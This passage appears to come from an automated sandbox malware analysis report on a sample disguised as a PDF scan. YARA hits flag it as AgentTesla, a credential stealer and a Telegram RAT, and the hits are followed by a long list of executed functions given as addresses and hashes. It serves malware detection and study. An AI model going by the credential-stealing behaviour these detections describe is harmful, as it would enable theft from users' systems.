                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.3430262414.00000000028BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3430262414.0000000002871000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.3430262414.0000000002871000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.3430262414.0000000002871000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:moderate
                                                                        Has exited:false

                                                                        Disassembly

                                                                        Reset < >

                                                                          Executed Functions

                                                                          Function 0132D658 Relevance: 2.2, Strings: 1, Instructions: 983COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: e6IV
                                                                          • API String ID: 0-2934522242
                                                                          • Opcode ID: 2e3607f9b098f9297bedaababcc70201cadceae5974b6a866e189ae284368ef5
                                                                          • Instruction ID: 8824432397d7ff89860f786935ff776d63bbcb7392f2dcd01a6991c3a9bf287d
                                                                          • Opcode Fuzzy Hash: 2e3607f9b098f9297bedaababcc70201cadceae5974b6a866e189ae284368ef5
                                                                          • Instruction Fuzzy Hash: 92A2A375A00228CFDB65DF69C984AD9BBB2FF89304F1581E9D509AB325DB319E81CF40
                                                                          Function 072A075F Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2285605041.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_72a0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: r
                                                                          • API String ID: 0-1812594589
                                                                          • Opcode ID: 214e010ee02b774011566983d49f8c6a347ffb862a3a8ca8b2f394fee48cc34b
                                                                          • Instruction ID: da440082b7057a46f3ebec67be564dbf494df51fa44fefc3f3f8b68015f6ff37
                                                                          • Opcode Fuzzy Hash: 214e010ee02b774011566983d49f8c6a347ffb862a3a8ca8b2f394fee48cc34b
                                                                          • Instruction Fuzzy Hash: 4FF034B4955229CFDB34EF18D844BEEB3B1FB48304F4014A8D90DA2640E3745E84CF12
                                                                          Function 0132F628 Relevance: .4, Instructions: 358COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d22c2eda698a865469ca806a8d7a67a43971eecfdb88b3c917465273c07c7a08
                                                                          • Instruction ID: 4252d55d9d460956ff1f10ffcf19f46976e730f4934f4c8b4c33ee7f977405d2
                                                                          • Opcode Fuzzy Hash: d22c2eda698a865469ca806a8d7a67a43971eecfdb88b3c917465273c07c7a08
                                                                          • Instruction Fuzzy Hash: A7C1D6323042258FEB19EF68D85066E7BB6EFC5754B18817AE905CB391CB35DC06C791
                                                                          Function 0132FAF8 Relevance: .2, Instructions: 208COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 919b9b5caa1e17dae113c9e69d4794eda64c3b820c52adf5ad9ca3eeec268fcf
                                                                          • Instruction ID: 0293dc2144774043fdca5668de83382d6f5d0c607fe5a5b571b39c03dbb1f240
                                                                          • Opcode Fuzzy Hash: 919b9b5caa1e17dae113c9e69d4794eda64c3b820c52adf5ad9ca3eeec268fcf
                                                                          • Instruction Fuzzy Hash: A2810935A00228CFCB25EF68C58499DBBF9FF88714B158169E9169B365DB30ED41CB90
                                                                          Function 05B00CE8 Relevance: .2, Instructions: 193COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2283005490.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2282883886.0000000005AB0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5ab0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3a0ae69c2b601c412c93318558e2ae7d5d0bbb905d0a646f6769a9a8ddccb440
                                                                          • Instruction ID: f1182e33be9eaf4ce33d53f781565f0750048f158c1a92a593f5ae389c31599f
                                                                          • Opcode Fuzzy Hash: 3a0ae69c2b601c412c93318558e2ae7d5d0bbb905d0a646f6769a9a8ddccb440
                                                                          • Instruction Fuzzy Hash: 40814878D04208CFDB54EFA9D8487ADBBF2FB88304F50A169C809A7394D7746986CF50
                                                                          Function 01320C2F Relevance: .1, Instructions: 138COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 81e60a7eb40605d1b125177af60daea51c8d59ceb44a6dfb1a6cc51454f310f4
                                                                          • Instruction ID: 453883d7223db71d694684b81b37a1b495d01f3b1bbd1a449ccb14ba76cf6737
                                                                          • Opcode Fuzzy Hash: 81e60a7eb40605d1b125177af60daea51c8d59ceb44a6dfb1a6cc51454f310f4
                                                                          • Instruction Fuzzy Hash: 59510471A00219CFDB19DF98C484ADDBBF2AF49324F189159E405BB3A1DB34AD89CF61
                                                                          Function 05B020F0 Relevance: .1, Instructions: 109COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2283005490.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2282883886.0000000005AB0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5ab0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9122e5fbe2607b3140143a955559b3755c94a47e63c217137a2b25ad8c76a053
                                                                          • Instruction ID: 685b4b3864679aa3b53f49d5d2b56a111f997287f92ecc54398d300515359322
                                                                          • Opcode Fuzzy Hash: 9122e5fbe2607b3140143a955559b3755c94a47e63c217137a2b25ad8c76a053
                                                                          • Instruction Fuzzy Hash: 95414E74D04218DFDB44DFA5E884BADBBB6FB49304F1090AAD519A73A4DB346D88CF60
                                                                          Function 05B02B18 Relevance: .1, Instructions: 99COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2283005490.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2282883886.0000000005AB0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5ab0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7265e5842925b3b5ce3672bc1e2c57d7ed48c65812da0dda929df4312ca51f75
                                                                          • Instruction ID: 673c24af19fd2c8f5a7fce00bd87dc1ecda0aeef5092a88d3ac9b8707ec27041
                                                                          • Opcode Fuzzy Hash: 7265e5842925b3b5ce3672bc1e2c57d7ed48c65812da0dda929df4312ca51f75
                                                                          • Instruction Fuzzy Hash: E5411274E05218CBDB54DFAAD844BADBBB7FB89304F1090AAC409A7394DB34AE45CF11
                                                                          Function 01321678 Relevance: .1, Instructions: 92COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 76ccec266e96a564b9f1b3287701bcb68c1191ff3e28a666a0433e43e7a0794b
                                                                          • Instruction ID: 80c37fefc79e45b955e37e7e9046459c60fce7d7735e78560af38a85ded11fa6
                                                                          • Opcode Fuzzy Hash: 76ccec266e96a564b9f1b3287701bcb68c1191ff3e28a666a0433e43e7a0794b
                                                                          • Instruction Fuzzy Hash: 5A319E35B001189FCF15EF6DD98099EBBF6BFC9750B54816AD805AB305DB30AD448BA0
                                                                          Function 013217C5 Relevance: .1, Instructions: 90COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3621bee94bca313a9464e933d534134ba510efdf5864e68e5b4723687e26d4ac
                                                                          • Instruction ID: f7d9bf99369375a641dd5e3df10eb4742b70219cf675eaf5af5559e5419cad86
                                                                          • Opcode Fuzzy Hash: 3621bee94bca313a9464e933d534134ba510efdf5864e68e5b4723687e26d4ac
                                                                          • Instruction Fuzzy Hash: 8E315370D002599FDB14DFA9C680AEEBFF6BF48344F24802AE909AB250DB759905CF90
                                                                          Function 013293F1 Relevance: .1, Instructions: 84COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 96a0392648941842f9f73aa162ab291025708df20fe5119bd6784d95581588ea
                                                                          • Instruction ID: b5b9822f83276bfde2a408aa676e99a484d7bb42ebbd3d5c45fd424ab9b98bbf
                                                                          • Opcode Fuzzy Hash: 96a0392648941842f9f73aa162ab291025708df20fe5119bd6784d95581588ea
                                                                          • Instruction Fuzzy Hash: 4A316AB0901228DFDB45EFA8D0447AEBBF6FF4930CFA081A5D505E7254D7384A85CB55
                                                                          Function 013217D0 Relevance: .1, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a9843023a3e47c327f73d3894d7ca9971d59be77ed092e2a722f76f82d6baf4f
                                                                          • Instruction ID: 369b5683515858dba56a1956a33953fad8e33c543b37e81eca4b8cd13e8b7d0f
                                                                          • Opcode Fuzzy Hash: a9843023a3e47c327f73d3894d7ca9971d59be77ed092e2a722f76f82d6baf4f
                                                                          • Instruction Fuzzy Hash: 2C313370D002599FDB14DFAAC580ADEBFF5BF48340F248029E909AB250DB759945CBA0
                                                                          Function 01321668 Relevance: .1, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bf29fcef06a603354021ae6f82cf949243a6ec598406267a51590a818d904a54
                                                                          • Instruction ID: ecef338bc267530cb88f1a56e44eb5fad26ef5e115e4e8392ec57b9d8a586fe1
                                                                          • Opcode Fuzzy Hash: bf29fcef06a603354021ae6f82cf949243a6ec598406267a51590a818d904a54
                                                                          • Instruction Fuzzy Hash: 4131BF35A00218DFCF15EFA9DA8059EBBF2BFC9360F54856AD845A7301DB30AD44CBA1
                                                                          Function 013209B8 Relevance: .1, Instructions: 80COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 40475d688a6ae61196f335eb9f3d2c8907d7c8ecf1181ef5b0044a9c0792c565
                                                                          • Instruction ID: f0cd6b33f3f9ac60822170fef4d6fbf3dddb15219b593b92602eb331da77eada
                                                                          • Opcode Fuzzy Hash: 40475d688a6ae61196f335eb9f3d2c8907d7c8ecf1181ef5b0044a9c0792c565
                                                                          • Instruction Fuzzy Hash: 5D216B34A01214DFDB14EFB9D898AADBBF2BF89714F204469E405EB3A0CB71AC41CB50
                                                                          Function 013208A0 Relevance: .1, Instructions: 76COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a8652e42c18dcffa65358efb71a6936cdc0d52eb9886f61ae8f172dbe15a5fd5
                                                                          • Instruction ID: 8d8def7f5c95731f436b9d9011680fa72ce74b5c33a5daa7aa37fc4e29eb85be
                                                                          • Opcode Fuzzy Hash: a8652e42c18dcffa65358efb71a6936cdc0d52eb9886f61ae8f172dbe15a5fd5
                                                                          • Instruction Fuzzy Hash: 3C21C0313202008FD345EB3DD894A1A3BA5EF8AB04B15419AE005CB3B6DA24DC09CB50
                                                                          Function 01329400 Relevance: .1, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c83347ba2e6128bece54f361f7ac7911871e5668e3251bcc53b515b3a45fab89
                                                                          • Instruction ID: 239bea893576003f07d90ce43a56ec78eeac69222f30823e4b8267ad8ccbbed0
                                                                          • Opcode Fuzzy Hash: c83347ba2e6128bece54f361f7ac7911871e5668e3251bcc53b515b3a45fab89
                                                                          • Instruction Fuzzy Hash: A33127B4D01228DFDB44EFA8D0487AEBBF6FF49308FA090A9D509A3254D7384A84CB55
                                                                          Function 0132D4B0 Relevance: .1, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d985b28024cb5abd46788a1f7c99fd4b1de836553435ac1c792568ea10435081
                                                                          • Instruction ID: 9cfbeb3146159ed6e05bf4a5d18d3a7cf2523affd74bf325f8751cf5c88092ad
                                                                          • Opcode Fuzzy Hash: d985b28024cb5abd46788a1f7c99fd4b1de836553435ac1c792568ea10435081
                                                                          • Instruction Fuzzy Hash: FB212274E00229CFDB04EFE9D8447EEBBF6FB89308F108129C515B7244DBB859408BA1
                                                                          Function 0125D05C Relevance: .1, Instructions: 74COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2261557118.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_125d000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7475a8c305d45de7be1802f6c06fd0941f3e6b213c3ace7e6a1d1b6f6b80afd3
                                                                          • Instruction ID: 446b9494ab438fb734f462e33b51975837234b4523ad2a239fe9a81a596274f0
                                                                          • Opcode Fuzzy Hash: 7475a8c305d45de7be1802f6c06fd0941f3e6b213c3ace7e6a1d1b6f6b80afd3
                                                                          • Instruction Fuzzy Hash: 272146B6124248DFDB55DF58D9C0B26BF65FB88324F24C56DEE090B242C376D40ACBA2
                                                                          Function 013209C8 Relevance: .1, Instructions: 71COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b9826ee4eeca80d0ac9b3161b31ea837e22fe92b02008933b4fc77dbb97f5856
                                                                          • Instruction ID: b3be3723e636251ae5ce376d4eb0387e41e64a31828c5b528b759b17c551a6c7
                                                                          • Opcode Fuzzy Hash: b9826ee4eeca80d0ac9b3161b31ea837e22fe92b02008933b4fc77dbb97f5856
                                                                          • Instruction Fuzzy Hash: 89215C30A012189FDB14EF79D498A9DBBF6BF88714F604469E405AB3A0CA719C45CB90
                                                                          Function 05B027D0 Relevance: .1, Instructions: 69COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2283005490.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2282883886.0000000005AB0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5ab0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1e1d5e5a26fe2aa21e4d44de1c366691ddce2c486f67077f34eadb9537cef64d
                                                                          • Instruction ID: c7d5dad9fef1eda98f2ebc02159e94048ad78ab71fe23f0601f9dc213353eb23
                                                                          • Opcode Fuzzy Hash: 1e1d5e5a26fe2aa21e4d44de1c366691ddce2c486f67077f34eadb9537cef64d
                                                                          • Instruction Fuzzy Hash: D6212878D04219CBDB08DFA9D8487BEBBB6FF89304F1090A9D505A3394DB746949CFA0
                                                                          Function 013208C8 Relevance: .1, Instructions: 61COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9c738ff3b24a9908a645ba5b5440c6bec2f62a522c25dc77d56bfe1381550ad0
                                                                          • Instruction ID: d628ca0b44833a58fcb678ea036e07029cc9aa344d5e752594ffaff3721f5904
                                                                          • Opcode Fuzzy Hash: 9c738ff3b24a9908a645ba5b5440c6bec2f62a522c25dc77d56bfe1381550ad0
                                                                          • Instruction Fuzzy Hash: 3E117C353102109FD348EB2ED888E1A7BEAFFC8A187508169F50ACB375DE70EC058B80
                                                                          Function 0132E8A0 Relevance: .1, Instructions: 58COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 60b7f6a8738ed32dacea27b81a3d405c1a452cb8eeb687e09b3b7d2cea89caa5
                                                                          • Instruction ID: be81c2e2c253d2d93a49023eb66315d1a597892c38b17d0b16786df4313e0b4b
                                                                          • Opcode Fuzzy Hash: 60b7f6a8738ed32dacea27b81a3d405c1a452cb8eeb687e09b3b7d2cea89caa5
                                                                          • Instruction Fuzzy Hash: 5A112371E0422DCBDB04EFAAC4456EEBBFAFB88314F04903AD509B3210D7741A45CBA1
                                                                          Function 0125D057 Relevance: .1, Instructions: 55COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2261557118.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_125d000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b4b5c62d74ef7dbd0f0298782f6981a4020ab818640269a2a7c5de0ff3647828
                                                                          • Instruction ID: 827b131d5586f432d8f0956bcc72c3d9d1e7341d1c24a2d021ae90ef7cbc462b
                                                                          • Opcode Fuzzy Hash: b4b5c62d74ef7dbd0f0298782f6981a4020ab818640269a2a7c5de0ff3647828
                                                                          • Instruction Fuzzy Hash: FE11BE76504285CFDB12CF54DAC4B16BF72FB84314F24C6A9DD094B656C33AD41ACBA2
                                                                          Function 072A0B81 Relevance: .0, Instructions: 48COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2285605041.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_72a0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1419a863c27973ba890f42cfb4bf4ca4424e9c1e6a28071cca1deef7e73ba9ab
                                                                          • Instruction ID: aa2a8b7e2e05a8ef7838386ddcd2f90bf56297e695d11c2d62341fe524ea2c49
                                                                          • Opcode Fuzzy Hash: 1419a863c27973ba890f42cfb4bf4ca4424e9c1e6a28071cca1deef7e73ba9ab
                                                                          • Instruction Fuzzy Hash: 7521D3B4A21228CFDB64DF58C888AD9BBF2FB48348F0041D5D91AA7354E7709E85CF50
                                                                          Function 072BF498 Relevance: .0, Instructions: 46COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2285605041.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_72a0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 75d79a19a50967e8373af699d533f629d81dca7a7195bc6f5a836b07eae608bf
                                                                          • Instruction ID: 68858824f300b8ed4ce9d24b5bc148b79016d368cbb008aba79191df443243fe
                                                                          • Opcode Fuzzy Hash: 75d79a19a50967e8373af699d533f629d81dca7a7195bc6f5a836b07eae608bf
                                                                          • Instruction Fuzzy Hash: FB11B7B0E0021A9FDB48DFE9C9457BEBBF5FF88300F10856AD518A7355DA705A418B91
                                                                          Function 013207D0 Relevance: .0, Instructions: 46COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 71dd2958554d70a2832e03df80bd60eaf9fc060e87d3440afb284dcdfa8adc30
                                                                          • Instruction ID: 3989870bb686b7367922fe56abc8d13dd24ba40a89c9b2733fa480bf14056dcc
                                                                          • Opcode Fuzzy Hash: 71dd2958554d70a2832e03df80bd60eaf9fc060e87d3440afb284dcdfa8adc30
                                                                          • Instruction Fuzzy Hash: BF01DF7282C2908FC702DB78E9A558D7FB1EB56208B2840DFD044DB162D17A9A08CB12
                                                                          Function 01320B28 Relevance: .0, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1c8f40a5ae3f21643e41b88023eb6e660984462b6fb758db475024bff2c73547
                                                                          • Instruction ID: ec72f09e6991be3efaa3e0e9d0195bd25426099ffd81e56c07e6b91e20ec9790
                                                                          • Opcode Fuzzy Hash: 1c8f40a5ae3f21643e41b88023eb6e660984462b6fb758db475024bff2c73547
                                                                          • Instruction Fuzzy Hash: 0A01B132D2071ADFCB01CBA9DC854DDBBB2EFC6311F514611E10077150E7702549CBA1
                                                                          Function 0124D76D Relevance: .0, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2261471732.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_124d000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: aea0e7de703562f4d50b0d7f2f7e297dc04eeee1edbf1ab883a7773826e3b3ba
                                                                          • Instruction ID: 8e00346ece7e08588a17043929bd6d20df08fa7049a9c763b61e5cf9d26ccd1d
                                                                          • Opcode Fuzzy Hash: aea0e7de703562f4d50b0d7f2f7e297dc04eeee1edbf1ab883a7773826e3b3ba
                                                                          • Instruction Fuzzy Hash: C6012B710183889BF71CCA69DD80B66FFD8EF51764F18C41AEF094A182C7B89844C671
                                                                          Function 01320BB0 Relevance: .0, Instructions: 39COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 69d62ae553f0c01386e753b6b388947986aa47486d2078e2bba78d7d82d5a590
                                                                          • Instruction ID: b999effc0bcdfdd52b7f31e565e8ba529233b3ea0efc7ace154d13d01eaef77d
                                                                          • Opcode Fuzzy Hash: 69d62ae553f0c01386e753b6b388947986aa47486d2078e2bba78d7d82d5a590
                                                                          • Instruction Fuzzy Hash: 53F0A471D10319DFDF14DB60C495AEFBBF5AF84310F01452AE402AB250DF70590A8B81
                                                                          Function 0124D76C Relevance: .0, Instructions: 36COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2261471732.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
